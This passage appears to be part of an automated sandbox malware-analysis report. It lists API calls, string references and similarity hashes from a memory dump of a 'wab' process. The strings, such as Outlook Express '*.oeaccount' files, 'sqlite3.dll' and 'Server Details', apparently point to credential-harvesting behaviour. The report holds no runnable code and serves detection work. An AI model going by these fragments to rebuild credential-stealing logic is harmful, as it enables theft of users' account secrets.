                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _ultoasprintf
                                                                                                                                                                                          • String ID: %s %s %s
                                                                                                                                                                                          • API String ID: 432394123-3850900253
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
                                                                                                                                                                                            • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
                                                                                                                                                                                            • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
                                                                                                                                                                                            • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?), ref: 0040870D
                                                                                                                                                                                            • Part of subcall function 0040767C: ??3@YAXPAX@Z.MSVCRT ref: 00407683
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$??3@$??2@CloseCreateHandleReadSize
                                                                                                                                                                                          • String ID: C@
                                                                                                                                                                                          • API String ID: 1449862175-3201871010
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00409682
                                                                                                                                                                                          • SendMessageA.USER32(5\@,00001019,00000000,?), ref: 004096B0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSendmemset
                                                                                                                                                                                          • String ID: 5\@
                                                                                                                                                                                          • API String ID: 568519121-3174280609
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscpy
                                                                                                                                                                                          • String ID: L$ini
                                                                                                                                                                                          • API String ID: 714388716-4234614086
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • failed memory resize %u to %u bytes, xrefs: 00411074
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _msizerealloc
                                                                                                                                                                                          • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                          • API String ID: 2713192863-2134078882
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadMenuA.USER32(00000000), ref: 00408DE9
                                                                                                                                                                                          • sprintf.MSVCRT ref: 00408E0C
                                                                                                                                                                                            • Part of subcall function 00408C8C: GetMenuItemCount.USER32(?), ref: 00408CA2
                                                                                                                                                                                            • Part of subcall function 00408C8C: memset.MSVCRT ref: 00408CC6
                                                                                                                                                                                            • Part of subcall function 00408C8C: GetMenuItemInfoA.USER32(?), ref: 00408CFC
                                                                                                                                                                                            • Part of subcall function 00408C8C: memset.MSVCRT ref: 00408D29
                                                                                                                                                                                            • Part of subcall function 00408C8C: strchr.MSVCRT ref: 00408D35
                                                                                                                                                                                            • Part of subcall function 00408C8C: _mbscat.MSVCRT ref: 00408D90
                                                                                                                                                                                            • Part of subcall function 00408C8C: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00408DAC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                          • String ID: menu_%d
                                                                                                                                                                                          • API String ID: 1129539653-2417748251
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406D34: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409576,00000000,00409494,?,00000000,00000104), ref: 00406D3F
                                                                                                                                                                                          • strrchr.MSVCRT ref: 00409579
                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040958E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                                                          • String ID: _lng.ini
                                                                                                                                                                                          • API String ID: 3334749609-1948609170
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                                                            • Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
                                                                                                                                                                                            • Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B
                                                                                                                                                                                          • _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                                                          • String ID: sqlite3.dll
                                                                                                                                                                                          • API String ID: 1983510840-1155512374
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044551F,34@,0000007F,?), ref: 004033BA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfileString
                                                                                                                                                                                          • String ID: 34@$Server Details
                                                                                                                                                                                          • API String ID: 1096422788-1041202369
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 438689982-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3110682361-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3510742995-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@$memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1860491036-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%